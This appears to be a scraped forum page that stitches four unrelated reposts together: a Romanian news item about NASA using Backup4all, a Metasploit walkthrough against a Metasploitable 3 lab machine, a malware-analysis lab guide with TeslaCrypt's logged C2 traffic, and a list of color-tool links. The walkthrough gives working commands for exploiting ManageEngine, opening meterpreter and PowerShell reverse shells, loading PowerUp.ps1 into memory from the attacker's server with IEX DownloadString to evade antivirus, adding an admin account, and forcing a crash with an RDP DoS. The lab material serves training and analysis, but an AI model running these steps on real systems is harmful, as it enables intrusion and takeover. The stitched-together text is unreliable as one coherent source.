Leaderboard

O aplicaţie realizată de IT-iștii din Cluj, folosită de către NASA pe Staţia Spaţială Internaţională Mai mulţi IT-işti clujeni, dezvoltatori ai unei aplicaţii de back-up, au ajuns cu produsul lor chiar pe Staţia Spaţială Internaţională, după ce americanii de la NASA au cumpărat 20 de licenţe ale soft-ului lor, aflat în prezent deja la a şasea versiune, cu vânzări pe întreg mapamondul, scrie News.ro. NASA a achiziţionat 20 de licenţe ale soft-ului Backup4all, o aplicaţie dezvoltată de o echipă de programatori clujeni care deţin compania Softland. Începând cu luna mai, aplicaţia este folosită pe Staţia Spaţială Internaţională pentru activităţile de backup realizate de către agenţie. O licenţă pentru această aplicaţie costă 49,99 dolari, dar pentru că NASA a cumpărat o cantitate mai mare de licenţă, a primit şi o reducere, astfel încât preţul total a fost de 770 de dolari. De asemenea, pentru că este folosită într-un mediu în care nu există conexiune la internet, aplicaţia a trebuit modificată. "În ianuarie anul acesta am primit un mail de la NASA în care ne spuneau că şi-ar dori să instaleze Backup4all într-un mediu foarte securizat, fără acces la internet. Ne-au explicat că modalitatea noastră de activare nu va funcţiona în environment-ul lor şi atunci am aflat că vor să instaleze aplicaţia pe Staţia Spaţială Internaţională. A urmat o lună întreagă de teste şi configuraţii pentru ceea ce aveau nevoie şi în 31 mai a început să fie utilizată. Astfel, acum rulează pe opt laptopuri de pe Staţia Spaţială Internaţională”, a explicat Lóránt Barla, din partea companiei Softland. Clujenii, care au ajuns cu Backup4all la a şasea versiune, au explicat că mai ţin legătura cu cei de la NASA, în cazul în care aceştia au nevoie de ajutor pe partea de suport. "Cei de la NASA au cumpărat aplicaţia de pe site-ul nostru ca orice client normal. Nici măcar nu am ştiut. Poate mai avem şi alţi clienţi la fel de importanţi, dar nu ştim. Ar fi avut şi alte opţiuni pentru că este destul de mare concurenţa pe partea de backup. De ce au ales aplicaţia noastră? Pentru că li s-a părut că este cea mai bună soluţie pe care o pot configura conform nevoilor lor. În ceea ce îi priveşte pe clienţii noştri de la NASA, mai comunicăm profesional cu ei şi dacă vor avea nevoie de suport, pot conta pe ajutorul nostru. Dar, de regulă, Backup4all se configurează şi îşi face back-up automat fără să fie nevoie de altă interacţiune cu dezvoltatorii”, a precizat Lóránt Barla. Ca firmă, Softland funcţionează din 1999, la început desfăşurând activităţi de outsourcing. Din 2002 însă, echipa s-a concentrat să dezvolte şi să vândă propriile programe. În prezent, Softland are 13 angajaţi care se ocupă inclusiv de marketing, relaţia cu clienţii şi vânzări. Sursa: http://www.digi24.ro/stiri/externe/o-aplicatie-realizata-de-it-istii-din-cluj-folosita-de-catre-nasa-pe-statia-spatiala-internationala-737922

Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on. Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems. To attach a meterpreter payload to our exploit, use the following command: set payload windows/meterpreter/reverse_tcp Copy If you run show options again now, you will see that Payloads options are visible now: LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241 LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444. Set our listen adress to our own address: set LHOST 192.168.0.241 Copy We're set to fire the exploit. Simply type: exploit Copy As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell. A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command: We're set to fire the exploit. Simply type: python -m SimpleHTTPServer Copy Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct. set payload windows/powershell_reverse_tcp Copy And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script in the memory, execute the following command in PowerShell: IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1") Copy Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt Invoke-AllChecks | Out-File allchecks.txt Copy To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here. As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc.. Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice! The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Copy Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group. Install-ServiceBinary -Name 'OpenSSHd' Copy Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!. Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work. Sursa: https://www.zero-day.io/metasploitwalkthrough/

In this post we will set up a virtual lab for malware analysis. We’ll create an isolated virtual network separated from the host OS and from the Internet, in which we’ll setup two victim virtual machines (Ubuntu and Windows 7) as well as an analysis server to mimic common Internet services like HTTP or DNS. Then, we’ll be able to log and analyze the network communications of any Linux or Windows malware, which will unknowingly connect to our server instead of the Internet. We demonstrate the setup with a real life use case where we analyze the traffic of the infamous TeslaCrypt ransomware, a now defunct ransomware which infected a large number of systems from 2015 to mid-2016. Diagram of our future setup. Note that the machines in the virtual network will be isolated from the host OS and will not be able to connect to the Internet. This guide includes quite a lot of material, so here’s a table of contents to give you an overview of what we’ll cover and let you jump directly to a section if you’d like. Creating the virtual machines Setup of the analysis machine: INetSim, Burp Creating an isolated virtual network Creating and restoring snapshots Using INetSim and Burp on the analysis machine to analyze the network traffic Setting up a shared folder between the analysis machine and the host OS Demo time: the TeslaCrypt ransomware Conclusion 1. Creating the virtual machines Here are two links you can use to download Ubuntu and Windows 7 virtual machine images. Ubuntu (victim machine 1 and analysis machine): download Ubuntu 16.10 64 bits from OsBoxes (direct link) Windows 7 (victim machine 2): download from the Microsoft Developer Website (select IE 11 on Win 7 (x86) and VirtualBox) Tip: if you already have an Ubuntu virtual machine you’re not using, you can simply clone it and reuse it in the next steps (right click > Clone). Before starting, make sure you have enough disk space available (I’d recommend at least 10-20 GB). Base Ubuntu machine OsBoxes provides us with a ready-to-go virtual disk that we can simply plug on a VM and start using right away. Start by extracting the archive you just downloaded. $ 7za e Ubuntu_16.10_Yakkety-VB-64bit.7z You’ll be provided with a VDI file representing the virtual disk of the machine. We’ll start by setting up the base Ubuntu image, which we will then clone to have our two Ubuntu VMs. In VirtualBox, create a new machine (New button), and call it Ubuntu analysis. Then, select how much RAM you want to give it. At this point, VirtualBox will ask you if you wish to create a new virtual hard disk or use an already exiting one. Select Use an existing virtual hard disk file, click on the directory icon at the right of the dropdown list, and select the VDI file. You can then power up the machine. The default password is osboxes.org. Basic setup The default keyboard uses the QWERTY layout. If like me you’re not familiar with it, start by changing it (Settings > Text Entry). Optionally, you can also change the default password using: $ passwd osboxes It can also be a good idea to update your packages. $ sudo apt-get update $ sudo apt-get upgrade Install the guest additions Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs. You will then be asked if you want to run the installer; answer yes, and enter the default password (by default osboxes.org). Once the installation is complete, power off the VM. Cloning Now that you have a basic Ubuntu VM ready to go, clone it (right click on it in the main VirtualBox interface > Clone). Name the clone Ubuntu victim, and check the checkbox to reinitialize its MAC address. Select Full clone for the type of clone. The two Ubuntu VMs created Windows 7 machine The download link I provided earlier points to a ZIP archive containing a OVA file. Unlike a VDI file it’s not only a virtual disk, but a full description of the virtual machine (including its virtual disk), so the only thing you need to do to create a virtual machine from it is to select File > Import Appliance in the main window of VirtualBox. If you can afford it, it’s probably better to give it at least 1024 MB of RAM. Once the import process is complete (it can take a few minutes), rename the VM Windows 7 victim and power it on. Install the guest additions Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs, and run the installer from the virtual CD which has been inserted. When you’re done, power off the machine. 2. Setup of the analysis machine: INetSim, Burp INetSim INetSim is a very handy and powerful utility that allows to simulate a bunch of standard Internet services on a machine. By default, it will among others emulate a DNS, HTTP and SMTP that you can easily tune. Since we’ll later configure our victim machines to have no Internet access, we will need INetSim to simulate it. There are several ways to install INetSim. The easiest is to run the following commands (in the analysis machine). $ sudo su $ echo "deb http://www.inetsim.org/debian/ binary/" > /etc/apt/sources.list.d/inetsim.list $ wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add - $ apt update $ apt install inetsim Note: in order to be able to copy-paste those commands in your analysis machine, select Devices > Shared Clipboard > Bidirectional. We’ll come back later on how to use INetSim. Burp Unfortunately, it seems that INetSim’s SSL support is quite limited: it comes with a certificate for a single host (inetsim.org) and doesn’t support generating SSL certificates on the fly. This is a problem since most malwares nowadays encrypt their communications with SSL. We’ll use Burp as a transparent SSL proxy, which will stand in the middle of the victim machines and INetSim for SSL connections. If you don’t need to intercept SSL traffic for now, you won’t necessarily need Burp. Burp supports generating on-the-fly SSL certificates for any our victim machines will connect to. It also creates a single root CA certificate, that we’ll later import in our victim machines. This way, we’ll be able to intercept the encrypted communications that our malware sends. You can download Burp from the official website. The download is a bash installation script, run it to install Burp: $ bash ~/Downloads/burpsuite_free_linux_v1_7_23.sh By default, the Burp executable will be ~/BurpSuiteFree/BurpSuiteFree. 3. Setting up an isolated virtual network As a reminder, we want to set up an isolated network containing our three VMs. This network will not be able to access the Internet. Also, we want the analysis machine to act as a network gateway to the victim machines in order to easily be able to intercept the network traffic and to simulate various services such as DNS or HTTP. In order to achieve this, we will use a VirtualBox Internal Network. For those familiar with VirtualBox, an internal network differs from a host-only network in that an internal network cannot access the host machine at all. For each of your three virtual machines, do the following: Open its settings Go to the Network section Change the Attached to field to Internal network Enter malware-analysis-network as the network name Network configuration Analysis machine Power on the analysis machine, open a terminal, and run the ifconfig command. You should have an interface named enp0s3. If the name differs, just adapt it in the instructions to follow. Open the file /etc/network/interfaces as root, and add the following at the end: auto enp0s3 iface enp0s3 inet static address 10.0.0.1 netmask 255.255.255.0 This will assign the machine the static IP 10.0.0.1 on our virtual network. Now that we have configured the network interface, we need to start it up using: $ sudo ifup enp0s3 Ubuntu victim machine The process is very similar here, except that we’ll assign it the static IP 10.0.0.2, and instruct it to use 10.0.0.1 as a gateway and as a DNS server. Append the following at the end of the file /etc/network/interfaces : auto enp0s3 iface enp0s3 inet static address 10.0.0.2 gateway 10.0.0.1 netmask 255.255.255.0 dns-nameservers 10.0.0.1 And run: $ sudo ifup enp0s3 $ sudo service networking restart You should now be able to ping the analysis machine: $ ping 10.0.0.1 PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data. 64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms 64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms Windows 7 victim machine Right-click on the network icon in the taskbar (or go to Start Menu > Control Panel > Network and Internet > Network and Sharing center), click on Local Area Connection 2 > Properties, select on Internet Protocol Version 4, and click on the Properties button. We’ll assign the static IP 10.0.0.3 to the machine, and configure the rest similarly to the Ubuntu victim machine. Network settings Make sure to validate the settings (click on OK, Apply, etc. until all the settings windows are gone). You should now be able to ping the analysis machine: > ping 10.0.0.1 Pinging 10.0.0.1 with 32 bytes of data: Reply from 10.0.0.1: bytes=32 time<1ms TTL=64 Reply from 10.0.0.1: bytes=32 time<1ms TTL=64 All set! 4. Creating and restoring snapshots Now that our victim VMs are properly configured and are in a clean state (i.e. not infected by any kind of malware), we are going to make a snapshot of their current state. This way, we will be able to easily reset them to this clean state at any point time. VirtualBox makes this very easy: in the window in which the VM is running, just select Machine > Take Snapshot. You can name the snapshot Clean state. Make sure to do this for both your Ubuntu and Windows 7 victim machines. It doesn’t hurt to do it for your analysis machine as well. When you’ll want to reset a machine to its clean state, simply power it off and check the checkbox Restore current snapshot ‘Clean state’. 5. Using INetSim and Burp on the analysis machine to analyze the network traffic INetSim As previously mentioned, INetSim enables us to wide range of standard Internet services including DNS, HTTP(S), SMTP, etc. It has a default configuration file /etc/inetsim/inetsim.conf which is very well documented. It also ships with a data directory (/var/lib/inetsim) containing various default files. Since you’ll probably want a different INetSim configuration each time you make a new analysis, I suggest you create a directory analysis which will contain a sub directory for each analysis. $ mkdir analysis We’ll already create a sub directory for the sake of example, and copy the default INetSim configuration file and data folder in it. $ mkdir analysis/test-analysis $ cp /etc/inetsim/inetsim.conf analysis/test-analysis $ sudo cp -r /var/lib/inetsim analysis/test-analysis/data $ sudo chmod -R 777 data $ cd analysis/test-analysis By default, INetSim listens on the local interface only. To make it available to all the machines of our virtual network, replace the following line in the configuration file we just copied: #service_bind_address 10.0.0.1 By: service_bind_address 0.0.0.0 Now, we need to disable systemd-resolved, which is a local DNS server shipped by default with Ubuntu and will conflict with INetSim’s DNS server. $ sudo systemctl disable systemd-resolved.service $ sudo service systemd-resolved.service stop By default, INetSim’s DNS server will resolve all the domain names to 127.0.0.1. We want any domain name to resolve to 10.0.0.1 (the analysis machine IP) instead; uncomment the following line: #dns_default_ip 10.0.0.1 I mentioned earlier that INetSim’s SSL support is not optimal since it only has a single certificate for a single hostname (inetsim.org) and doesn’t allow to generate per-host certificates on the fly. To overcome that, we’ll run Burp on port 443 as a transparent proxy in front of INetSim. Therefore, we need to bind INetSim’s HTTPS server to a different port, say port 8443. Replace the following line: #https_bind_port 443 By: https_bind_port 8443 Now, let’s run INetSim! $ sudo inetsim --data data --conf inetsim.conf INetSim 1.2.6 (2016-08-29) by Matthias Eckert & Thomas Hungenberg [...] === INetSim main process started (PID 3605) === Session ID: 3605 Listening on: 0.0.0.0 Real Date/Time: 2017-06-04 12:58:07 Fake Date/Time: 2017-06-04 12:58:07 (Delta: 0 seconds) Forking services... * dns_53_tcp_udp - started (PID 3621) * irc_6667_tcp - started (PID 3631) * daytime_13_tcp - started (PID 3638) * discard_9_tcp - started (PID 3642) * discard_9_udp - started (PID 3643) * ident_113_tcp - started (PID 3634) * syslog_514_udp - started (PID 3635) [...] As you can see, INetSim has launched a bunch of network services. Those are all configurable and can be disabled in the configuration file. This configuration file is very well documented and explains all the options of INetSim; I recommend you take a few minutes to read it. Now, power on of your victim VM, open a web browser, and browse to any address (e.g. github.com). You should see the following: (Note that this default file corresponds to the HTML file data/http/fakefiles/sample.html.) Back on the analysis machine, shut down INetSim (CTRL + C). * dns_53_tcp_udp - stopped (PID 3621) * irc_6667_tcp - stopped (PID 3631) * daytime_13_tcp - stopped (PID 3638) [...] Simulation stopped. Report written to '/var/log/inetsim/report/report.3877.txt' (24 lines) As you can see, INetSim has created a summary report for us. It contains all the interactions our victim machine had with INetSim services. === Report for session '3877' === Real start date : 2017-06-04 13:18:27 Simulated start date : 2017-06-04 13:18:27 Time difference on startup : none 2017-06-04 13:18:38 First simulated date in log file 2017-06-04 13:18:40 DNS connection, type: A, class: IN, requested name: github.com 2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/, file name: data/http/fakefiles/sample.html 2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/favicon.ico, file name: data/http/fakefiles/sample.html 2017-06-04 13:18:40 Last simulated date in log file Burp for SSL interception To be able to analyze the SSL traffic, we also need to run Burp. We’ll run it as a transparent proxy in front of INetSim. When a victim machine will initiate a SSL connection, it will first go to Burp, which will then proxy it to INetSim. This section is not mandatory: if you don’t need to intercept SSL traffic right now, just jump to the next section. Here’s how it will look like with Burp in the middle: Start Burp as root: $ sudo /home/osboxes/BurpSuiteFree/BurpSuiteFree (We need to run it as root otherwise it won’t be able to bind port 443, which is a privileged port. There are other ways to do this, but let’s not bother here) Create a temporary project (you don’t have any other options with the free version anyway), and go to the Proxy tab, then to the Options sub-tab. You’ll see Burp’s default listener listening on port 8080. Click on the row corresponding to the default listener, and edit it (Edit) button. Configure it as follows: Binding tab Bind to port: 443 Bind to address: all interfaces Request handling tab: Redirect to host: localhost Redirect to port: 8443 Check Support invisible proxying Validate the settings, and you should get a listener similar to: By default, Burp intercepts the incoming requests and waits for you to explicitly let them pass through. To avoid this, go to the Intercept tab and click the button Intercept is on to disable it. Since Burp Free doesn’t allow you to save a project, you can export the settings we just made in order to import them next time you start Burp. To do this, use Burp > Project options > Save project options. Let’s make sure our setup if correctly working. Start INetSim, and run: $ curl --insecure https://localhost You should get: <html> <head> <title>INetSim default HTML page</title> </head> <body> <p></p> <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p> <p align="center">This file is an HTML document.</p> </body> </html> Importing Burp’s CA certificate on our victim machines Power on your Windows 7 victim machine, and try to browse to a HTTPS URL (e.g. https://github.com), you’ll see a warning similar to: This is because Burp generates a SSL certificate signed by its own CA certificate, which our victim machine doesn’t trust for now. In Burp, add a new proxy listener on port 8080, listening on all interfaces (tab Proxy > Options > button Add): Then, from the victim machine, browse to http://10.0.0.1:8080. Click on CA Certificate in the top-right corner to download Burp’s CA certificate. On the Windows 7 victim machine: open the file, click Install certificate > Next > Place all certificates in the following store: Trusted Root Certification Authorities > Next On the Ubuntu victim machine: Convert the certificate to the appropriate format (.crt) using $ openssl x509 -in ~/Downloads/cacert.der -inform DER -out burp.crt Copy it to /usr/local/share/ca-certificates $ sudo cp burp.crt /usr/local/share/ca-certificates/ Run $ sudo update-ca-certificates Firefox by default doesn’t use the system’s certificate store. If you want the SSL connection to work properly in Firefox as well, go to the Firefox settings into Advanced > Certificates > Import. Choose burp.crt, check Trust this CA to identify websites All set! Once you imported Burp’s CA certificate in the victim machines, make sure to create a new snapshot (e.g. Clean state with Burp’s CA certificate installed). 6. Setting up a shared folder between the analysis machine and the host OS At some point, you’ll obviously want to transfer some files to the analysis machine or to one of the victim machine; we’ll set up a file share to achieve it. In the VirtualBox running the analysis machine, go to Devices > Shared Folders > Shared folders settings. Create a new shared folder, choose the local folder of your host OS it should be mapped to, and choose a name. Check the checkbox to make it permanent. Now on the analysis machine, mount the shared folder: $ mkdir ~/malware-analysis-share $ sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) malware-analysis-share ~/malware-analysis-share And you’re good to go. In my case, all the files of my host machine located in /home/christophetd/malware-analysis-share will also end up in ~/malware-analysis-share in the analysis machine. Transferring files to a victim machine At some point, you’ll most probably need to transfer some files (e.g. malware samples) to one of the victim machines. Setting up a file share for them is a bad idea, because it means the victim machine (and by extent, the malware sample you’re running on it) have access to it. The simplest way to achieve a file transfer to the Ubuntu victim machine is to use netcat. Here’s a quick example. # Receiving machine having IP 10.0.0.2 $ nc -lvp 4444 > file.exe # Analysis machine (sender) $ cat file_to_transfer.exe | nc 10.0.0.2 4444 For a Window victim, we unfortunately don’t have netcat available. Alternatives might exist, but they probably don’t ship by default. One option is to use INetSim to serve your file to the victim machine. # inetsim.conf # Remove the default line: http_fakefile exe sample_gui.exe x-msdos-program # Replace it by http_fakefile exe file_to_transfer.exe x-msdos-program # And put file_to_transfer.exe in ./data/http/fakefiles With this of configuration, just browse any URL ending with a ‘.exe’ (e.g. http://github.com/file.exe). 7. Demo time: the TeslaCrypt ransomware Time for a quick demo! I downloaded a sample of the ransomware TeslaCrypt, transferred it to our Windows 7 victim machine, and executed it. After a few seconds, all the files of the VM have been encrypted and the following window pops-up. TeslaCrypt main window (click for full-size image) The machine’s files have been encrypted and replaced by files with the ECC extension After checking the logs of INetSim, we can see that the ransomware did the following DNS lookups: 7tno4hib47vlep5o.tor2web.org 7tno4hib47vlep5o.tor2web.blutmagie.de 7tno4hib47vlep5o.tor2web.fi bitcoin.toshi.io And sent several HTTP requests to those domains. HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA= HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE= HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI= HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT We see similar requests are made to tor2web.org, tor2web.blutmagie.de and tor2web.fi. Those services allow to access the Tor network without having to install Tor Browser or a similar tool. The malware contacts the Tor hidden service 7tno4hib47vlep5o.onion, which is probably some kind of C&C server. The payload of the request is a base64 encoded string, which decodes to: Subject=Ping &key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3 &addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT &files=0 &size=0 &version=0.2.6a &date=1496648675 &OS=7601 &ID=16 &subid=0 &gate=G1 It also makes an API call to bitcoin.toshio.io (which doesn’t exist anymore), most probably to check if the ransom has been paid to the bitcoin address 1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT. It seems like the malware generates an unique bitcoin address for each infected computer, since the address didn’t receive or send out any money. Conclusion Hopefully this guide will be helpful and allow you to safely analyze the network interactions of a malware. Keep in mind that some malwares detect when they are being run in a virtual machine and might adapt their behavior (e.g. do nothing). Here’s an article from MalwareBytes on the subject. Also, remember that while analyzing a malware’s network traffic can be very useful, it’s only one kind of dynamic analysis. Others include monitoring the register, the system calls, the files opened / created, etc. Open Security Training offers a full hands-on course on the topic, for free. Don’t hesitate to leave a comment if you found this guide useful / awesome / too long / too detailed. A big thank you to lbarman for the proofreading and numerous suggestions. Stay safe! Sursa: https://blog.christophetd.fr/set-up-your-own-malware-analysis-lab-with-virtualbox-inetsim-and-burp/

Color Scheme Generator http://wellstyled.com/tools/colorscheme2/index-en.html Color Blender Tool http://www.meyerweb.com/eric/tools/color-blend/ Top Color Combinations Graphic Design Tutorials : Graphic Design Software Directory & Portal for Graphics Tips : Desktop Publishing Resources & Graphic Design Links Kuler http://kuler.adobe.com/ Color Contrast Tool Colour Check - Etre Visibone’s Color Lab VisiBone Webmaster's Color Lab I like Your Colors Tool http://www.redalt.com/Tools/ilyc.php Pantone and Hexidecimal Colour Chart http://www.unimelb.edu.au/webcentre/tools/developertools/pantone.html Advanced Javascript Color Picker http://www.softpedia.com/get/Internet/WEB-Design/Web-Design-related/Advanced-Javascript-color-picker.shtml Color Combinations Color combinations - Cure for designers block Color Combo http://www.colorcombo.com/ Color Combos Color Combinations | Color Schemes | Color Palettes Color Library http://www.colorcombos.com/combolibrary.html Color Schemer http://www.colorschemer.com/online.html Web Color Schemes http://www.returnofdesign.com/colors/ Color Lovours http://www.colourlovers.com/ Lynda Weinman’s Browser-Safe Colors Organized By Hue http://www.websitetips.com/designer/colors1.html Lynda Weinman’s Website Tips For Designers: Browser-Safe Colors Organized By Value (Lights and Darks) Web Design, Development Resources - HTML Tutorials, CSS, Web Design Articles, Web Page Design, Web Design Tips, Fonts, Articles, Tutorials, HTML - Web Site Resources, Website Tips - WebsiteTips.com Visibone’s Swatch Collections http://www.visibone.com/swatches/ WEB DESIGN RESOURCES DIRECTORY http://www.allgraphicdesign.com/ Graphic Design Resources http://www.allwebdesignresources.com// Web Design Resources http://www.a2zwebdesignsource.com/ A2Z Web Design Resources http://www.bestcatalog.net/ Best Catalog http://www.hooverwebdesign.com/resources/ Hoover Web Design http://www.webmasteredge.com/ 